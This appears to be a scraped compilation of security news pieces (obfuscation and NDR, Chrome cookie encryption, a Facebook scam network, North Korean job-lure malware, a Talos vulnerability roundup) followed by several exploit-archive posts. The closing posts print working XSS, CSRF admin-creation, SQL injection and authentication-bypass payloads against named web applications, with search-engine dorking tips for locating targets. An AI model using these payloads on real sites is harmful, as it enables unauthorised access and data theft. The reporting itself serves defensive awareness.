How to detect and prevent attackers from using these various techniques
Obfuscation is an important technique for protecting software that also carries risks, especially when used by malware authors. In this article, we examine obfuscation, its effects, and responses to it.
What Is Obfuscation?
Obfuscation is the technique of intentionally making information difficult to read, especially in

**How to detect and prevent attackers from using these various techniques**

Obfuscation is an important technique for protecting software that also carries risks, especially when used by malware authors. In this article, we examine obfuscation, its effects, and responses to it.

**What Is Obfuscation?**

Obfuscation is the technique of intentionally making information difficult to read, especially in computer coding. An important use case is data obfuscation, in which sensitive data is made unrecognizable to protect it from unauthorized access. Various methods are used for this.

For example, only the last four digits of a credit card number are often displayed, while the remaining digits are replaced by Xs or asterisks. In contrast, encryption involves converting data into an unreadable form that can only be decrypted using a special key.

**Obfuscation In Code**

When computer code is obfuscated, complex language and redundant logic are used to make the code difficult to understand. The aim? To deceive both human readers and programs such as decompilers. To do this, parts of the code are encrypted, metadata is removed, or meaningful names are replaced by meaningless ones. Inserting unused or meaningless code is also a common practice to disguise the actual code.

A so-called obfuscator can automate these processes and modify the source code so that it still works but is more difficult to understand.

Other methods of obfuscation include compressing the entire program, making the code unreadable, and changing the control flow to create unstructured, difficult-to-maintain logic.

Inserting dummy code that does not affect the logic or the program's result is also common.

Several techniques are often combined to achieve a multi-layered effect and increase security.

**The Flip Side**

Unfortunately, obfuscation is not only a protection, it is also a challenge. Obfuscation is not only used by legitimate software developers, but also by malicious software authors. The goal of obfuscation is to anonymize cyber attackers, reduce the risk of detection, and hide malware by changing the overall signature and fingerprint of the malicious code – even if the payload is a known threat. The signature is a hash, a unique alphanumeric representation of a malware element. Signatures are very often hashed, but they can also be another short representation of a unique code within a malware element.

Rather than trying to create a new signature by modifying the malware itself, obfuscation focuses on deployment mechanisms to fool antivirus solutions that rely on signatures. Compare this to the use of machine learning, predictive analysis, and artificial intelligence to improve defenses.

Obfuscation, or the disguising of code, can be both "good" and "bad". In the case of "bad" obfuscation, hackers combine various techniques to hide malware and create multiple layers of disguise. One of these techniques is packers. These are software packages that compress malware to hide its presence and make the original code unreadable. Then there are cryptographers who encrypt malware or parts of software to restrict access to code that could alert antivirus programs.

Another method is the insertion of dead code. This involves inserting useless code into the malware to disguise the program's appearance. Attackers can also use command modification, which involves changing the command codes in malware programs. This changes the appearance of the code, but not its behavior.

Obfuscation in the code is, as we have seen, only the first step because no matter how much work the hacker puts into obfuscating the code to bypass EDR, malware must communicate within the network and to the outside world to be "successful". This means that communication must also be obfuscated. In contrast to the past, when networks were scanned quickly, and attempts were immediately made to extract data in the terabyte range at once, attackers today communicate more quietly so that the sensors and switches for the monitoring tools do not strike.

The aim to get IP addresses via scanning, for example, is now followed more slowly to stay under the radar. Reconnaissance, in which the threat actors try to collect data about their targeted victims, e.g. via their network architecture, is also becoming slower and more obscure.

A common obfuscation method is Exclusive OR (XOR). This method hides data in such a way that it can only be read by people who link the code with 0x55 XOR. ROT13 is another trick in which letters are replaced by a code.

****Blasts From The Past:****

*   A well-known example of obfuscation is the SolarWinds attack in 2020. Hackers used obfuscation to bypass defenses and hide their attacks.
*   Another interesting example is PowerShell, a Microsoft Windows tool that attackers are abusing. Malware that uses PowerShell obscures its activities through techniques such as string encoding, command obfuscation, dynamic code execution, and more.
*   Another example is the XLS.HTML attack. Here, hackers used elaborate obfuscation techniques to hide their malicious activities. They changed their encryption methods at least ten times within a year to avoid detection. Their tactics included plain text, escape encoding, Base64 encoding, and even Morse code.
*   In another threat, attackers exploited vulnerabilities in ThinkPHP to execute remote code on servers. They installed a cloaked web shell called "Dama" that allowed permanent access and further attacks.

**Why You Should Not Rely On Signatures Alone**

Signature-based detection is like an old friend–it's reliable when it comes to known threats. But when it comes to new, unknown threats, it can sometimes be in the dark. Here are a few reasons why you shouldn't rely solely on signatures:

1.  Malware authors are true masters of hide and seek. They use various techniques to disguise their malicious programs. Even small changes to the code can cause signature detection to fail.
2.  With polymorphic malware, malware behaves like a chameleon. It constantly changes its structure to avoid detection. Every time it is executed, the code looks different.
3.  Static signatures? Not a chance! Metamorphic malware is even more tricky. It adapts during execution and changes its code dynamically, making it almost impossible to catch with static signatures.
4.  Also, zero-day exploits behave like the "new kid on the block": they are fresh and unknown, and signature-based systems have no chance of recognizing them.
5.  Besides that, when a signature-based solution returns too many false positives, it becomes inefficient. Too many false alerts in daily business affect your security team and waste valuable resources.

In short, signature detection, e.g., in an EDR, is a useful tool, but it's not enough on its own to ward off all threats. A more comprehensive security strategy that also includes behavioral analysis, machine learning, and other modern techniques is essential.

**Why NDR Tools Are So Important**

Anomaly-based IDS solutions are like detectives who keep an eye on a system's normal behavior and sound the alarm when they detect unusual activity. But Network Detection and Response (NDR) tools even go a step further: they constantly adapt to stay one step ahead of the changing cyber threat landscape and offer a significantly higher level of security than traditional signature-based approaches through their advanced analysis and integration. They are able to detect and defend against both known and unknown threats.

****Here's How They Do It:****

*   **Behavioral Analysis:** NDR tools monitor network traffic and analyze behavior. They detect unusual patterns that could indicate command-and-control (C&C) communication, such as irregular data transfers.
*   **Protocol Monitoring:** They examine HTTP requests, DNS traffic, and other protocols to detect suspicious behavior or communication that may be associated with obfuscated malware.
*   **Metadata Analysis:** NDR tools analyze metadata to detect unusual patterns that indicate suspicious activity. Machine learning models help identify typical obfuscation techniques that are visible through suspicious behavior in network traffic.
*   **Long-term Communication Monitoring:** As obfuscating communication is now crucial for hackers, as they adopt slower and stealthier techniques to evade detection and collect data within and outside networks, it is helpful that NDR also looks at longer periods of time, e.g. 3 days, in addition to its ability to perform batch runs, e.g. within minutes, in order to have comparative values and monitor and detect irregularities, and real-time alerting would lead to a large number of alerts if a scan with a ping is detected every minute or so. But is every ping an attack? Certainly not!
*   **Mitre ATT&CK and ZEEK**: These protocols provide valuable insights into threats that use obfuscation. Their integration with NDR tools significantly improves threat detection capabilities.
*   **Threat Data Sharing:** NDR tools share threat data with other security solutions. This enables faster detection of known obfuscation techniques and suspicious behavior. The integration with EDR tools allows them to correlate suspicious activity on endpoints with network traffic, which significantly improves security analysis.

For more on **why NDR is a crucial security tool** and how it detects even the most advanced threats and complex forms of obfuscation, download our whitepaper on Advanced Persistent Threat (APT) detection.

To see how NDR acts in your corporate network, and precisely how it detects and responds to APTs, watch our recorded APT detection video.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Obfuscation: There Are Two Sides To Everything

Google has announced that it's adding a new layer of protection to its Chrome browser through what's called app-bound encryption to prevent information-stealing malware from grabbing cookies on Windows systems.
"On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks," Will Harris from the Chrome security team

Data Encryption / Browser Security

Google has announced that it's adding a new layer of protection to its Chrome browser through what's called app-bound encryption to prevent information-stealing malware from grabbing cookies on Windows systems.

"On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks," Will Harris from the Chrome security team said. "However, the DPAPI does not protect against malicious applications able to execute code as the logged in user – which info-stealers take advantage of."

App-bound encryption is an improvement over DPAPI in that it interweaves an app's identity (i.e., Chrome in this case) into encrypted data to prevent another app on the system from accessing it when decryption is attempted.

"Because the app-bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app," Harris said. "Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn't be doing."

Given that the method strongly binds the encryption key to the machine, it will not function correctly in environments where Chrome profiles roam between multiple machines. Organizations that support roaming profiles are encouraged to follow its best practices and configure the ApplicationBoundEncryptionEnabled policy.

The change, which went live last week with the release of Chrome 127, applies only to cookies, although Google said it intends to expand this protection to passwords, payment data, and other persistent authentication tokens.

Back in April, the tech giant outlined a technique that employs a Windows event log type called DPAPIDefInformationEvent to reliably detect access to browser cookies and credentials from another application on the system.

It's worth noting that the web browser secures passwords and cookies in Apple macOS and Linux systems using Keychain services and system-provided wallets such as kwallet or gnome-libsecret, respectively.

The development comes amid a slew of security improvements added to Chrome in recent months, including enhanced Safe Browsing, Device Bound Session Credentials (DBSC), and automated scans when downloading potentially suspicious and malicious files.

"App-bound encryption increases the cost of data theft to attackers and also makes their actions far noisier on the system," Harris said. "It helps defenders draw a clear line in the sand for what is acceptable behavior for other apps on the system."

It also follows Google's announcement that it no longer plans to deprecate third-party cookies in Chrome, prompting the World Wide Web Consortium (W3C) to reiterate that they enable tracking and that the decision undermines the progress achieved so far to make the web work without third-party cookies.

"Tracking and subsequent data collection and brokerage can support micro-targeting of political messages, which can have a detrimental impact on society," it said. "The unfortunate climb-down will also have secondary effects, as it is likely to delay cross-browser work on effective alternatives to third-party cookies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Chrome Adds App-Bound Encryption to Protect Cookies from Malware

Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.
Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos[.]com.
"These

Online Fraud / Malvertising

Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.

Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos\[.\]com.

"These fraudulent sites were accessible only through mobile devices and ad lures, a tactic aimed at evading automated detection systems," the company said, noting the network comprised 608 fraudulent websites and that the activity spans several short-lived waves.

A notable aspect of the sophisticated campaign is that it exclusively targeted mobile users who accessed the scam sites via ad lures on Facebook, some of which relied on limited-time discounts to entice users into clicking on them. Recorded Future said as many as 100 Meta Ads related to a single scam website are served in a day.

The counterfeit websites and ads have been found to mainly impersonate a major online e-commerce platform and a power tools manufacturer, as well as single out victims with bogus sales offers for products from various well-known brands. Another crucial distribution mechanism entails the use of fake user comments on Facebook to lure potential victims.

"Merchant accounts and related domains linked to the scam websites are registered in China, indicating that the threat actors operating this campaign likely established the business they use to manage the scam merchant accounts in China," Recorded Future noted.

This is not the first time criminal e-commerce networks have sprung up with an aim to harvest credit card information and make illicit profits off fake orders. In May 2024, a massive network of 75,000 phony online stores – dubbed BogusBazaar – was discovered to have made more than $50 million by advertising shoes and apparel by well-known brands at low prices.

Then last month, Orange Cyberdefense revealed a previously undocumented traffic direction system (TDS) called R0bl0ch0n TDS that's used to promote affiliate marketing scams through a network of fake shop and sweepstake survey sites with the goal of obtaining credit card information.

"Several distinct vectors are used for the initial dissemination of the URLs that redirect through the R0bl0ch0n TDS, indicating that these campaigns are likely carried out by different affiliates," security researcher Simon Vernin said.

The development comes as fake Google ads displayed when searching for Google Authenticator on the search engine have been observed redirecting users to a rogue site ("chromeweb-authenticators\[.\]com") that delivers a Windows executable hosted on GitHub, which ultimately drops an information stealer named DeerStealer.

What makes the ads seemingly legitimate is that they appear as if they are from "google.com" and the advertiser's identity is verified by Google, according to Malwarebytes, which said "some unknown individual was able to impersonate Google and successfully push malware disguised as a branded Google product as well."

Malvertising campaigns have also been spotted disseminating various other malware families such as SocGholish (aka FakeUpdates), MadMxShell, and WorkersDevBackdoor, with Malwarebytes uncovering infrastructure overlaps between the latter two, indicating that they are likely run by the same threat actors.

On top of that, ads for Angry IP Scanner have been used to lure users to fake websites, and the email address "goodgoo1ge@protonmail\[.\]com" has been used to register domains delivering both MadMxShell and WorkersDevBackdoor.

"Both malware payloads have the capability to collect and steal sensitive data, as well as provide a direct entry path for initial access brokers involved in ransomware deployment," security researcher Jerome Segura said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook Ads Lead to Fake Websites Stealing Credit Card Information

DEV#POPPER is back, looking to deliver a comprehensive, updated infostealer to coding job seekers by way of a savvy social engineering gambit.

Source: sakkmesterke via Alamy Stock Photo

The North Korea-based DEV#POPPER campaign is back, with an updated malware and social engineering arsenal that it's using to target software developers worldwide for data theft.

That's according to research from the Securonix Threat Research team, which found in an analysis today that the known threat group is casting a wider net than ever before, having added Linux and macOS variants to its malware toolbox in addition to its existing Windows binary.

The campaign, which focused primarily on South Korea before, has spread out globally, and is also active in Europe, the Middle East, and North America.

It's unclear as to the level of specific targeting the campaign is using, but there are overlaps with other efforts by North Korean actors to use fake recruiting in state-sponsored attacks.

"I would imagine that the ultimate goal for the attackers is conducting a successful operation against an individual on a corporate or company-owned endpoint," says Tim Peck, senior threat researcher at Securonix. "Based on the malware used, its primary purpose is theft. Typically, with financially motivated attacks, we see either ransomware or cryptominers being used."

**Targeting Developers With Social Engineering**

To lure in their victims, DEV#POPPER threat actors pose as interviewers looking to hire software developers for nonexistent positions. When someone applies, they send off a .ZIP file to the target that purports to be an npm package to be used for testing the applicant's coding skills.

"The use of practical-style interviews makes for an easy medium for the attackers to run malicious code on the interviewee's system," Peck notes. "Given the practical nature of developer interviews, it would not be uncommon to be asked to compile or execute code, as opposed to most other types of interviews. In such a use case, it would generally not raise suspicions for the interviewee."

When the interviewee extracts and executes the contents of the package, a well-hidden line of JavaScript code executes, which kicks off the infection chain, the researchers explained in their analysis of the campaign. "The .ZIP file contains dozens of legitimate files, making identifying potential foul play difficult to spot if it's missed by any installed antivirus."

Antivirus, by way, may indeed miss it: the malicious file, which is obfuscated in multiple ways, has just a 3/64 vendor detection rate on VirusTotal as of the Securonix blog post being published today.

The level of savvy scamming is notable: "In this particular attack, the lengths that the threat actors go through to pull off their social engineering scheme is quite bold," says Peck. "If you think about it, the amount of work needed to host fake job interviews goes way beyond traditional compromise actions such as blasting out phishing emails, for example."

**DEV#POPPER's Cyberattack Routine & Updated Malware**

The malware strategy is not just now multiplatform, but is also more sophisticated than its predecessor, according to Securonix.

After deobfuscating the script, the researchers were able to detect the campaign's command-and-control address (C2), as well as a number of malicious functions. The latter includes a fresh main function, dubbed "M," which orchestrates data extraction and code execution on different operating systems.

"It begins by identifying the platform, constructs paths and variables, and then calls appropriate extraction functions based on the detected OS," according to the analysis.

Other functions are in charge of sending the stolen data to the C2, collecting system and geolocation information, and assigning unique identifiers to each infected host (which allows the server to track which data came from which machine). Another function downloads next-stage payloads, while another new addition performs directory traversal, which includes filters to exclude certain files and directories from extraction (in order to appear more legitimate).

Securonix researchers noted that after the script was executed on a compromised host, the attackers then fetched a series of additional payloads culminating in an updated version of a Python script that DEV#POPPER has used before. This performs the actual theft of various sensitive files, plus keylogging and surveillance; one new capability is the ability to steal browser cookies, credit-card information entered into websites, and data for any installed browser extensions.

"The risk of running this kind of information-stealer malware on a business endpoint could be catastrophic," Peck says. "Considering the information stolen, the threat actors would almost immediately have access to all of the user's active browser sessions, cookies, and passwords. Additionally, they would have remote access to the endpoint allowing them to embed themselves deeper or attempt to move laterally into other systems that the user might have access to."

While it's difficult for businesses to protect against this type of attack, given that they might not be aware that a target is job-hunting, awareness training is always an option on the defensive side.

"First, if you're employed and actively interviewing, never conduct the interview on a company-owned appliance," Peck warns. "Second, though job interviews are oftentimes stressful situations, maintain a security-focused mindset. Social engineering attacks can be difficult to spot, however if the request seems odd or out of the norm, don't be afraid to back out of a request for fear of rejection or making a situation awkward."

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

North Koreans Target Devs Worldwide With Spyware, Job Offers

A binary in Apple macOS could allow an adversary to execute an arbitrary binary that bypasses SIP.

Wednesday, July 31, 2024 12:00

Cisco Talos’ Vulnerability Research team has helped to disclose and patch six new vulnerabilities over the past three weeks, including one in a driver that powers certain NVIDIA graphics cards.  

The majority of the vulnerabilities that Talos disclosed during this period exist in Ankitects Anki, an open-source program that allows users to study information using flashcards. The most serious of these issues has a CVSS score of 9.6 out of 10. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Out-of-bounds read vulnerability in NVIDIA GPU Compiler Driver **

_Discovered by Piotr Bania._ 

A compiler driver in some NVIDIA graphics cards contains an out-of-bounds read vulnerability that could allow an adversary to read an arbitrary memory region. 

An adversary could exploit TALOS-2024-1956 (CVE-2024-0107) by sending a targeted device a specially crafted executable/shader file, leading to an out-of-bounds read. 

This vulnerability could be triggered from guest machines running virtualization environments to perform a guest-to-host escape — as previously demonstrated in other GPU vulnerabilities like TALOS-2018-0533. 

Talos researchers were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, which led to being able to execute the vulnerable code on the Hyper-V host. While Microsoft has deprecated RemoteFX, this feature may still be present in older versions of the Windows operating system. 

**Multiple vulnerabilities in Ankitects Anki flashcard software **

_Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B._ 

The Ankitects Anki flashcard software contains multiple vulnerabilities, one of which could lead to arbitrary code execution. This open-source tool allows users to create and share flashcards to study information.  

An adversary could exploit all these vulnerabilities by sharing a specially crafted, malicious flashcard with a targeted user.  

TALOS-2024-1994 (CVE-2024-32152) could lead to the creation of an arbitrary file along a fixed path. This vulnerability exists because a malicious user could manipulate a blocklist that normally prevents the use of certain malicious commands.  

TALOS-2024-1992 (CVE-2024-29073) also involves manipulating the command blocklist, but in this case, could lead to arbitrary file read. 

An adversary could also exploit TALOS-2024-1995 (CVE-2024-32484), a cross-site scripting vulnerability, in the software to inject JavaScript code into a flashcard and read a normally inaccessible file.  

The most serious among this group of vulnerabilities is TALOS-2024-1993 (CVE-2024-26020), a script injection vulnerability that could lead to arbitrary code execution. This vulnerability has a CVSS score of 9.6 out of 10. In Talos’ testing, researchers could exploit this vulnerability to obtain full command injection on the targeted user’s system.

Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues

AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : AMPLE BILLS v1.0 XSS Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : app/invoice/mpdf/examples/formsubmit.php?1<ScRiPt>prompt(913011)</ScRiPt>[+] http://localhost/ample/app/invoice/mpdf/examples/formsubmit.php?1%3CScRiPt%3Eprompt(913011)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AMPLE BILLS 1.0 Cross Site Scripting

Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Aero CMS 0.0.1 Cross Site Request Forgery

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#windows